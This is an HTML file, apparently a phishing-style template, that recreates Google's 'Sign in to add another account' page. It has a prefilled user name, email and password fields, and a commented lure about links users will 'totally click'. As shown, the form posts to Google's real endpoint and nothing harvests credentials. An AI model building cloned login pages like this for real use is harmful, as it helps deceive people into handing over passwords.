<html>
  <head>
    <title>Awesome text</title>
    <style>
        #BODY_1 {
        bottom: 0px;
        color: rgb(64, 64, 64);
        height: 267px;
        left: 0px;
        min-width: 100%;
        position: absolute;
        right: 0px;
        top: 0px;
        width: 1425px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 712.5px 133.5px;
        transform-origin: 712.5px 133.5px;
        background: rgb(255, 255, 255) none repeat scroll 0% 0% / auto padding-box border-box;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        margin: 0px;
        outline: rgb(64, 64, 64) none 0px;
    }/*#BODY_1*/

    #DIV_2 {
        bottom: 0px;
        color: rgb(64, 64, 64);
        height: 697px;
        left: 0px;
        min-height: 100%;
        position: relative;
        right: 0px;
        top: 0px;
        text-align: center;
        width: 1425px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 712.5px 348.5px;
        transform-origin: 712.5px 348.5px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_2*/

    #DIV_3 {
        color: rgb(64, 64, 64);
        height: 83px;
        width: 1425px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 712.5px 41.5px;
        transform-origin: 712.5px 41.5px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
        overflow: hidden;
    }/*#DIV_3*/

    #DIV_4 {
        color: rgb(64, 64, 64);
        height: 83px;
        width: 1337px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 712.5px 41.5px;
        transform-origin: 712.5px 41.5px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
        padding: 0px 44px;
    }/*#DIV_4*/

    #DIV_4:after {
        clear: both;
        color: rgb(64, 64, 64);
        display: table;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_4:after*/

    #DIV_4:before {
        color: rgb(64, 64, 64);
        display: table;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_4:before*/

    #DIV_5 {
        color: rgb(64, 64, 64);
        height: 38px;
        width: 116px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 58px 19px;
        transform-origin: 58px 19px;
        background: rgba(0, 0, 0, 0) url("https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_112x36dp.png") no-repeat scroll 0% 0% / 112px 36px padding-box border-box;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        margin: 25px 610.5px 20px;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_5*/

    #DIV_6 {
        color: rgb(64, 64, 64);
        margin: 0 auto 25px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 712.5px 307px;
        transform-origin: 712.5px 307px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
        padding: 0px 44px 100px;
    }/*#DIV_6*/

    #DIV_6:after {
        clear: both;
        color: rgb(64, 64, 64);
        display: table;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_6:after*/

    #DIV_6:before {
        color: rgb(64, 64, 64);
        display: table;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_6:before*/

    #DIV_7 {
        color: rgb(64, 64, 64);
        height: 24px;
        text-align: center;
        width: 1337px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 668.5px 12px;
        transform-origin: 668.5px 12px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_7*/

    #H2_8 {
        color: rgb(85, 85, 85);
        height: 24px;
        text-align: center;
        width: 1337px;
        column-rule-color: rgb(85, 85, 85);
        perspective-origin: 668.5px 12px;
        transform-origin: 668.5px 12px;
        animation: fontfix 0.1s linear 0s 1 normal none running;
        border: 0px none rgb(85, 85, 85);
        font: normal normal normal normal 18px / normal "Open Sans", arial;
        margin: 0px 0px 15px;
        outline: rgb(85, 85, 85) none 0px;
    }/*#H2_8*/

    #DIV_9 {
        box-shadow: rgba(0, 0, 0, 0.298039) 0px 2px 2px 0px;
        color: rgb(64, 64, 64);
        height: 276px;
        width: 274px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 177px 178px;
        transform-origin: 177px 178px;
        background: rgb(247, 247, 247) none repeat scroll 0% 0% / auto padding-box border-box;
        border: 0px none rgb(64, 64, 64);
        border-radius: 2px 2px 2px 2px;
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
        padding: 40px;
    }/*#DIV_9*/

    #IMG_10 {
        background-color: rgb(64, 64, 64);
        text-align: center;
        color: white;
        vertical-align: middle;
        display: block;
        height: 96px;
        line-height: 96px;
        width: 96px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 48px 48px;
        transform-origin: 48px 48px;
        border: 0px none rgb(64, 64, 64);
        border-radius: 50% 50% 50% 50%;
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        margin: 0px 89px 10px;
        outline: rgb(64, 64, 64) none 0px;
    }/*#IMG_10*/

    #P_11 {
        color: rgb(64, 64, 64);
        height: 18px;
        min-height: 16px;
        text-align: center;
        width: 274px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 137px 9px;
        transform-origin: 137px 9px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal bold normal 16px / normal Arial, sans-serif;
        margin: 10px 0px 0px;
        outline: rgb(64, 64, 64) none 0px;
    }/*#P_11*/

    #FORM_12 {
        color: rgb(64, 64, 64);
        height: 127px;
        width: 274px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 137px 63.5px;
        transform-origin: 137px 63.5px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        margin: 0px;
        outline: rgb(64, 64, 64) none 0px;
    }/*#FORM_12*/

    #INPUT_13, #INPUT_14, #INPUT_16, #INPUT_18, #INPUT_20, #INPUT_22, #INPUT_24 {
        box-sizing: content-box;
        display: none;
        height: auto;
        width: auto;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        background: rgba(0, 0, 0, 0) none repeat scroll 0% 0% / auto padding-box border-box;
        border: 0px none rgb(0, 0, 0);
        padding: 0px;
    }/*#INPUT_13, #INPUT_14, #INPUT_16, #INPUT_18, #INPUT_20, #INPUT_22, #INPUT_24*/

    #INPUT_15, #INPUT_17, #INPUT_21 {
        box-sizing: content-box;
        display: none;
        height: auto;
        width: auto;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        background: rgba(0, 0, 0, 0) none repeat scroll 0% 0% / auto padding-box border-box;
        border: 0px none rgb(0, 0, 0);
        padding: 0px;
    }/*#INPUT_15, #INPUT_17, #INPUT_21*/

    #INPUT_19, #INPUT_23 {
        box-sizing: content-box;
        display: none;
        height: auto;
        width: auto;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        background: rgba(0, 0, 0, 0) none repeat scroll 0% 0% / auto padding-box border-box;
        border: 0px none rgb(0, 0, 0);
        padding: 0px;
    }/*#INPUT_19, #INPUT_23*/

    #SPAN_25 {
        box-sizing: border-box;
        color: rgb(64, 64, 64);
        display: block;
        height: 28px;
        text-align: center;
        text-overflow: ellipsis;
        white-space: nowrap;
        width: 274px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 137px 14px;
        transform-origin: 137px 14px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 14px / 28px Arial, sans-serif;
        margin: 0px 0px 10px;
        outline: rgb(64, 64, 64) none 0px;
        overflow: hidden;
        padding: 0px 8px;
    }/*#SPAN_25*/

    #INPUT_26 {
        color: rgb(64, 64, 64);
        display: none;
        height: 44px;
        position: relative;
        visibility: hidden;
        width: 100%;
        z-index: 1;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        background: rgb(255, 255, 255) url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR4nGP6zwAAAgcBApocMXEAAAAASUVORK5CYII=") repeat scroll 0% 0% / auto padding-box border-box;
        border-top: 1px solid rgb(192, 192, 192);
        border-right: 1px solid rgb(217, 217, 217);
        border-bottom: 1px solid rgb(217, 217, 217);
        border-left: 1px solid rgb(217, 217, 217);
        border-radius: 1px 1px 1px 1px;
        font: normal normal normal normal 16px / normal BlinkMacSystemFont;
        outline: rgb(64, 64, 64) none 0px;
        overflow: hidden;
        padding: 0px 8px;
    }/*#INPUT_26*/

    #LABEL_27 {
        bottom: 373px;
        clip: rect(1px 1px 1px 1px);
        color: rgb(64, 64, 64);
        display: block;
        height: 0px;
        left: 575.5px;
        position: absolute;
        right: 849.5px;
        top: 324px;
        visibility: hidden;
        width: 0px;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
        overflow: hidden;
    }/*#LABEL_27*/

    #INPUT_28 {
        background-position: 98% 50%;
        bottom: 0px;
        color: rgb(64, 64, 64);
        display: block;
        height: 44px;
        left: 0px;
        position: relative;
        right: 0px;
        top: 0px;
        width: 274px;
        z-index: 1;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 137px 22px;
        transform-origin: 137px 22px;
        background: rgb(255, 255, 255) url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAAmJJREFUWAntV7uKIkEUvbYGM4KID3wEIgjKRLLpKGLgFwiCfslGhkb7IbLgAzE1GhMxWxRRBEEwmEgDERWfW6fXuttq60a2wU6B1qlzb9U5fatsKROJVigUArvd7oeAyePx6Af3qGYymT7F2h8Wi+V7Pp+fmE7iv4Sw81GieusKIzNh4puCJzdaHIagCW1F4KSeQ4O4pPLoPb/3INBGBZ7avgz8fxWIxWIUCoX43Blegbe3NwoGg88zwMoncFUB8Yokj8dDdrv9MpfHVquV/H4/iVcpc1qgKAp5vV6y2WxaWhefreB0OimXy6kGkD0YDKhSqdB2u+XJqVSK4vE4QWS5XKrx0WjEcZ/PR9lslhwOh8p1Oh2q1Wp0OBw4RwvOKpBOp1kcSdivZPLvmxrjRCKhiiOOSmQyGXp5ecFQbRhLcRDRaJTe39//BHW+2cDr6ysFAoGrlEgkwpwWS1I7z+VykdvtliHuw+Ew40vABvb7Pf6hLuMk/rGY02ImBZC8dqv04lpOYjaw2WzUPZcB2WMPZet2u1cmZ7MZTSYTNWU+n9N4PJbp3GvXYPIE2ADG9Xqder2e+kTr9ZqazSa1222eA6FqtUoQwqHCuFgscgWQWC6XaTgcEiqKQ9poNOiegbNfwWq1olKppB6yW6cWVcDHbDarIuzuBBaLhWrqVvwy/6wCMnhLXMbR4wnvtX/F5VxdAzJoRH+2BUYItlotmk6nLGW4gX6/z+IAT9+CLwPPr8DprnZ2MIwaQBsV+DBKUEfnQ8EtFRdFneBDKWhCW8EVGbdUQfxESR6qKhaHBrSgCe3fbLTpPlS70M0AAAAASUVORK5CYII=") no-repeat scroll 98% 50% / 16px 18px padding-box border-box;
        border-top: 1px solid rgb(192, 192, 192);
        border-right: 1px solid rgb(217, 217, 217);
        border-bottom: 1px solid rgb(217, 217, 217);
        border-left: 1px solid rgb(217, 217, 217);
        border-radius: 1px 1px 1px 1px;
        font: normal normal normal normal 16px / normal BlinkMacSystemFont;
        margin: -1px 0px 10px;
        outline: rgb(64, 64, 64) none 0px;
        padding: 0px 8px;
    }/*#INPUT_28*/

    #INPUT_29 {
        bottom: 0px;
        color: rgb(255, 255, 255);
        cursor: default;
        display: block;
        height: 36px;
        left: 0px;
        min-width: 46px;
        position: relative;
        right: 0px;
        text-align: center;
        text-shadow: rgba(0, 0, 0, 0.0980392) 0px 1px 0px;
        top: 0px;
        white-space: pre;
        width: 274px;
        z-index: 1;
        column-rule-color: rgb(255, 255, 255);
        align-items: flex-start;
        perspective-origin: 137px 18px;
        transform-origin: 137px 18px;
        background: rgb(77, 144, 254) -webkit-linear-gradient(top, rgb(77, 144, 254), rgb(71, 135, 237)) repeat scroll 0% 0% / auto padding-box border-box;
        border: 1px solid rgb(48, 121, 237);
        border-radius: 3px 3px 3px 3px;
        font: normal normal bold normal 13px / 36px Arial, sans-serif;
        margin: 0px 0px 10px;
        outline: rgb(255, 255, 255) none 0px;
        padding: 0px;
        transition: all 0.218s ease 0s;
    }/*#INPUT_29*/

    #A_30 {
        color: rgb(66, 127, 237);
        cursor: pointer;
        text-decoration: none;
        column-rule-color: rgb(66, 127, 237);
        border: 0px none rgb(66, 127, 237);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(66, 127, 237) none 0px;
    }/*#A_30*/

    #DIV_31 {
        color: rgb(64, 64, 64);
        height: 89px;
        width: 1337px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 668.5px 44.5px;
        transform-origin: 668.5px 44.5px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_31*/

    #P_32 {
        color: rgb(85, 85, 85);
        height: 16px;
        text-align: center;
        width: 1337px;
        column-rule-color: rgb(85, 85, 85);
        perspective-origin: 668.5px 8px;
        transform-origin: 668.5px 8px;
        border: 0px none rgb(85, 85, 85);
        font: normal normal normal normal 14px / normal Arial, sans-serif;
        margin: 0px 0px 30px;
        outline: rgb(85, 85, 85) none 0px;
    }/*#P_32*/

    #A_33 {
        color: rgb(66, 127, 237);
        cursor: pointer;
        text-align: center;
        text-decoration: none;
        column-rule-color: rgb(66, 127, 237);
        border: 0px none rgb(66, 127, 237);
        font: normal normal normal normal 14px / normal Arial, sans-serif;
        outline: rgb(66, 127, 237) none 0px;
    }/*#A_33*/

    #P_34 {
        color: rgb(85, 85, 85);
        height: 16px;
        text-align: center;
        width: 1337px;
        column-rule-color: rgb(85, 85, 85);
        perspective-origin: 668.5px 8px;
        transform-origin: 668.5px 8px;
        border: 0px none rgb(85, 85, 85);
        font: normal normal normal normal 14px / normal Arial, sans-serif;
        margin: 0px 0px 10px;
        outline: rgb(85, 85, 85) none 0px;
    }/*#P_34*/

    #DIV_35 {
        color: rgb(64, 64, 64);
        height: 17px;
        width: 230px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 115px 8.5px;
        transform-origin: 115px 8.5px;
        background: rgba(0, 0, 0, 0) url("https://ssl.gstatic.com/accounts/ui/wlogostrip_230x17_2x.png") no-repeat scroll 0% 0% / 230px 17px padding-box border-box;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        margin: 10px 553.5px;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_35*/

    #DIV_36 {
        bottom: 0px;
        color: rgb(64, 64, 64);
        height: 35px;
        left: 0px;
        position: absolute;
        right: 0px;
        top: 661px;
        width: 1425px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 712.5px 18px;
        transform-origin: 712.5px 18px;
        border-top: 1px solid rgb(229, 229, 229);
        border-right: 0px none rgb(64, 64, 64);
        border-bottom: 0px none rgb(64, 64, 64);
        border-left: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
        overflow: hidden;
    }/*#DIV_36*/

    #DIV_37 {
        color: rgb(64, 64, 64);
        height: 38.0938px;
        white-space: nowrap;
        width: 1337px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 712.5px 22.5469px;
        transform-origin: 712.5px 22.5469px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
        padding: 7px 44px 0px;
    }/*#DIV_37*/

    #DIV_37:after {
        clear: both;
        color: rgb(64, 64, 64);
        display: table;
        white-space: nowrap;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_37:after*/

    #DIV_37:before {
        color: rgb(64, 64, 64);
        display: table;
        white-space: nowrap;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_37:before*/

    #UL_38 {
        color: rgb(64, 64, 64);
        float: left;
        height: 16px;
        max-width: 80%;
        min-height: 16px;
        white-space: nowrap;
        width: 232.078px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 116.031px 8px;
        transform-origin: 116.031px 8px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        margin: 11.05px 0px;
        outline: rgb(64, 64, 64) none 0px;
        padding: 0px;
    }/*#UL_38*/

    #LI_39, #LI_41, #LI_43, #LI_45 {
        color: rgb(115, 115, 115);
        display: inline;
        height: auto;
        white-space: nowrap;
        width: auto;
        column-rule-color: rgb(115, 115, 115);
        perspective-origin: 0px 0px;
        transform-origin: 0px 0px;
        border: 0px none rgb(115, 115, 115);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(115, 115, 115) none 0px;
        padding: 0px 16.575px 0px 0px;
    }/*#LI_39, #LI_41, #LI_43, #LI_45*/

    #A_40, #A_42, #A_46 {
        color: rgb(115, 115, 115);
        cursor: pointer;
        text-align: left;
        text-decoration: none;
        white-space: nowrap;
        column-rule-color: rgb(115, 115, 115);
        border: 0px none rgb(115, 115, 115);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(115, 115, 115) none 0px;
    }/*#A_40, #A_42, #A_46*/

    #A_44 {
        color: rgb(115, 115, 115);
        cursor: pointer;
        text-align: left;
        text-decoration: none;
        white-space: nowrap;
        column-rule-color: rgb(115, 115, 115);
        border: 0px none rgb(115, 115, 115);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(115, 115, 115) none 0px;
    }/*#A_44*/

    #DIV_47 {
        color: rgb(64, 64, 64);
        display: inline;
        height: auto;
        white-space: nowrap;
        width: auto;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#DIV_47*/

    #SPAN_48 {
        color: rgb(64, 64, 64);
        display: block;
        float: right;
        height: 21px;
        white-space: nowrap;
        width: 187.078px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 93.5312px 10.5px;
        transform-origin: 93.5312px 10.5px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#SPAN_48*/

    #LABEL_49 {
        color: rgb(64, 64, 64);
        white-space: nowrap;
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#LABEL_49*/

    #IMG_50 {
        color: rgb(64, 64, 64);
        cursor: default;
        height: 21px;
        vertical-align: top;
        white-space: nowrap;
        width: 21px;
        column-rule-color: rgb(64, 64, 64);
        perspective-origin: 10.5px 10.5px;
        transform-origin: 10.5px 10.5px;
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 11.05px / 0px Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#IMG_50*/

    #SELECT_51 {
        width: 163px;
        perspective-origin: 81.5px 9px;
        transform-origin: 81.5px 9px;
    }/*#SELECT_51*/

    #OPTION_52, #OPTION_53, #OPTION_55, #OPTION_57, #OPTION_59, #OPTION_61, #OPTION_63, #OPTION_65, #OPTION_67, #OPTION_69, #OPTION_71, #OPTION_73, #OPTION_75, #OPTION_77, #OPTION_79, #OPTION_81, #OPTION_83, #OPTION_85, #OPTION_87, #OPTION_89, #OPTION_91, #OPTION_93, #OPTION_95, #OPTION_97, #OPTION_99, #OPTION_101, #OPTION_103, #OPTION_105, #OPTION_107, #OPTION_109, #OPTION_111, #OPTION_113, #OPTION_115, #OPTION_117, #OPTION_119 {
        cursor: default;
        height: auto;
        min-height: 15.6px;
        width: auto;
        align-self: center;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        font: normal normal normal normal 13px / 24px BlinkMacSystemFont;
    }/*#OPTION_52, #OPTION_53, #OPTION_55, #OPTION_57, #OPTION_59, #OPTION_61, #OPTION_63, #OPTION_65, #OPTION_67, #OPTION_69, #OPTION_71, #OPTION_73, #OPTION_75, #OPTION_77, #OPTION_79, #OPTION_81, #OPTION_83, #OPTION_85, #OPTION_87, #OPTION_89, #OPTION_91, #OPTION_93, #OPTION_95, #OPTION_97, #OPTION_99, #OPTION_101, #OPTION_103, #OPTION_105, #OPTION_107, #OPTION_109, #OPTION_111, #OPTION_113, #OPTION_115, #OPTION_117, #OPTION_119*/

    #OPTION_54, #OPTION_56, #OPTION_60, #OPTION_64, #OPTION_68, #OPTION_72, #OPTION_76, #OPTION_80, #OPTION_84, #OPTION_88, #OPTION_92, #OPTION_96, #OPTION_100, #OPTION_104, #OPTION_108, #OPTION_112, #OPTION_116, #OPTION_120 {
        cursor: default;
        height: auto;
        min-height: 15.6px;
        width: auto;
        align-self: center;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        font: normal normal normal normal 13px / 24px BlinkMacSystemFont;
    }/*#OPTION_54, #OPTION_56, #OPTION_60, #OPTION_64, #OPTION_68, #OPTION_72, #OPTION_76, #OPTION_80, #OPTION_84, #OPTION_88, #OPTION_92, #OPTION_96, #OPTION_100, #OPTION_104, #OPTION_108, #OPTION_112, #OPTION_116, #OPTION_120*/

    #OPTION_58, #OPTION_62, #OPTION_70, #OPTION_78, #OPTION_86, #OPTION_94, #OPTION_102, #OPTION_110, #OPTION_118 {
        cursor: default;
        height: auto;
        min-height: 15.6px;
        width: auto;
        align-self: center;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        font: normal normal normal normal 13px / 24px BlinkMacSystemFont;
    }/*#OPTION_58, #OPTION_62, #OPTION_70, #OPTION_78, #OPTION_86, #OPTION_94, #OPTION_102, #OPTION_110, #OPTION_118*/

    #OPTION_66, #OPTION_74, #OPTION_90, #OPTION_106 {
        cursor: default;
        height: auto;
        min-height: 15.6px;
        width: auto;
        align-self: center;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        font: normal normal normal normal 13px / 24px BlinkMacSystemFont;
    }/*#OPTION_66, #OPTION_74, #OPTION_90, #OPTION_106*/

    #OPTION_82, #OPTION_98 {
        cursor: default;
        height: auto;
        min-height: 15.6px;
        width: auto;
        align-self: center;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        font: normal normal normal normal 13px / 24px BlinkMacSystemFont;
    }/*#OPTION_82, #OPTION_98*/

    #OPTION_114 {
        cursor: default;
        height: auto;
        min-height: 15.6px;
        width: auto;
        align-self: center;
        perspective-origin: 50% 50%;
        transform-origin: 50% 50%;
        font: normal normal normal normal 13px / 24px BlinkMacSystemFont;
    }/*#OPTION_114*/

    #SCRIPT_121, #SCRIPT_122, #SCRIPT_124, #SCRIPT_126, #SCRIPT_128, #SCRIPT_130, #SCRIPT_132 {
        color: rgb(64, 64, 64);
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#SCRIPT_121, #SCRIPT_122, #SCRIPT_124, #SCRIPT_126, #SCRIPT_128, #SCRIPT_130, #SCRIPT_132*/

    #SCRIPT_123, #SCRIPT_125, #SCRIPT_129, #SCRIPT_133 {
        color: rgb(64, 64, 64);
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#SCRIPT_123, #SCRIPT_125, #SCRIPT_129, #SCRIPT_133*/

    #SCRIPT_127, #SCRIPT_131 {
        color: rgb(64, 64, 64);
        column-rule-color: rgb(64, 64, 64);
        border: 0px none rgb(64, 64, 64);
        font: normal normal normal normal 13px / normal Arial, sans-serif;
        outline: rgb(64, 64, 64) none 0px;
    }/*#SCRIPT_127, #SCRIPT_131*/
    </style>
  </head>
  <body>
  <!--<div>
      This is an awesome text that eventually is going to have <a target="_blank" href="http://www.google.com">Some links</a>, that you expect the user to totally click.
  </div>-->
    <div id="DIV_2">
<div id="DIV_3">
<div id="DIV_4">
<div id="DIV_5">
</div>
</div>
</div>
<div id="DIV_6">
<div id="DIV_7">
<h2 id="H2_8">
Sign in to add another account
</h2>
</div>
<div id="DIV_9">
<div id="IMG_10">
  A
</div>
<p id="P_11">
Alfonso Perez
</p>
<form method="post" action="https://accounts.google.com/multilogin/challenge/sl/password" id="FORM_12">
<input name="Page" type="hidden" value="RememberedAddSession" id="INPUT_13" />
<input id="INPUT_26" name="Email" type="email" placeholder="Email" value="example@gmail.com" />
<label for="Passwd" id="LABEL_27">
  Password
</label>
<input id="INPUT_28" name="Passwd" type="password" placeholder="Password" />
<input id="INPUT_29" name="signIn" type="submit" value="Sign in" />
</form> <a id="A_30" href="https://accounts.google.com/signin/recovery?continue=https%3A%2F%2Fmail.google.com%2Fmail&amp;service=mail&amp;Email=example%40gmail.com&amp;ignoreShadow=0&amp;hl=en">Need help?</a>
</div>
<div id="DIV_31">
<p id="P_32">
 <a id="A_33" href="https://accounts.google.com/AccountChooser?continue=https%3A%2F%2Fmail.google.com%2Fmail&amp;hl=en&amp;service=mail">Sign in with a different account</a>
</p>
<p id="P_34">
One Google Account for everything Google
</p>
<div id="DIV_35">
</div>
</div>
</div>
<div id="DIV_36">
<div id="DIV_37">
<ul id="UL_38">
<li id="LI_39">
   <a href="https://www.google.com/intl/en/about" id="A_40">About Google</a>
</li>
<li id="LI_41">
   <a href="https://accounts.google.com/TOS?loc=US&amp;hl=en&amp;privacy=true" id="A_42">Privacy</a>
</li>
<li id="LI_43">
   <a href="https://accounts.google.com/TOS?loc=US&amp;hl=en" id="A_44">Terms</a>
</li>
<li id="LI_45">
   <a href="http://www.google.com/support/accounts?hl=en" id="A_46">Help</a>
</li>
</ul>
<div id="DIV_47">
 <span id="SPAN_48">
  <label for="lang-chooser" id="LABEL_49">
    <img src="//ssl.gstatic.com/images/icons/ui/common/universal_language_settings-21.png" alt="Change language" id="IMG_50" />
  </label>
  <select id="SELECT_51" name="lang-chooser">

    <option value="af" id="OPTION_52">
      ‪Afrikaans‬
    </option>
    <option value="az" id="OPTION_53">
      ‪azərbaycan dili‬
    </option>
    <option value="ms" id="OPTION_54">
      ‪Bahasa Melayu‬
    </option>
    <option value="ca" id="OPTION_55">
      ‪català‬
    </option>
    <option value="cs" id="OPTION_56">
      ‪Čeština‬
    </option>
    <option value="da" id="OPTION_57">
      ‪Dansk‬
    </option>
    <option value="de" id="OPTION_58">
      ‪Deutsch‬
    </option>
    <option value="et" id="OPTION_59">
      ‪eesti‬
    </option>
    <option value="en-GB" id="OPTION_60">
      ‪English (United Kingdom)‬
    </option>
    <option value="en" selected="selected" id="OPTION_61">
      ‪English (United States)‬
    </option>
    <option value="es" id="OPTION_62">
      ‪Español (España)‬
    </option>
    <option value="es-419" id="OPTION_63">
      ‪Español (Latinoamérica)‬
    </option>
    <option value="eu" id="OPTION_64">
      ‪euskara‬
    </option>
    <option value="fil" id="OPTION_65">
      ‪Filipino‬
    </option>
    <option value="fr-CA" id="OPTION_66">
      ‪Français (Canada)‬
    </option>
    <option value="fr" id="OPTION_67">
      ‪Français (France)‬
    </option>
    <option value="gl" id="OPTION_68">
      ‪galego‬
    </option>
    <option value="hr" id="OPTION_69">
      ‪Hrvatski‬
    </option>
    <option value="in" id="OPTION_70">
      ‪Indonesia‬
    </option>
    <option value="zu" id="OPTION_71">
      ‪isiZulu‬
    </option>
    <option value="is" id="OPTION_72">
      ‪íslenska‬
    </option>
    <option value="it" id="OPTION_73">
      ‪Italiano‬
    </option>
    <option value="sw" id="OPTION_74">
      ‪Kiswahili‬
    </option>
    <option value="lv" id="OPTION_75">
      ‪latviešu‬
    </option>
    <option value="lt" id="OPTION_76">
      ‪lietuvių‬
    </option>
    <option value="hu" id="OPTION_77">
      ‪magyar‬
    </option>
    <option value="nl" id="OPTION_78">
      ‪Nederlands‬
    </option>
    <option value="no" id="OPTION_79">
      ‪norsk‬
    </option>
    <option value="pl" id="OPTION_80">
      ‪polski‬
    </option>
    <option value="pt" id="OPTION_81">
      ‪Português (Brasil)‬
    </option>
    <option value="pt-PT" id="OPTION_82">
      ‪português (Portugal)‬
    </option>
    <option value="ro" id="OPTION_83">
      ‪română‬
    </option>
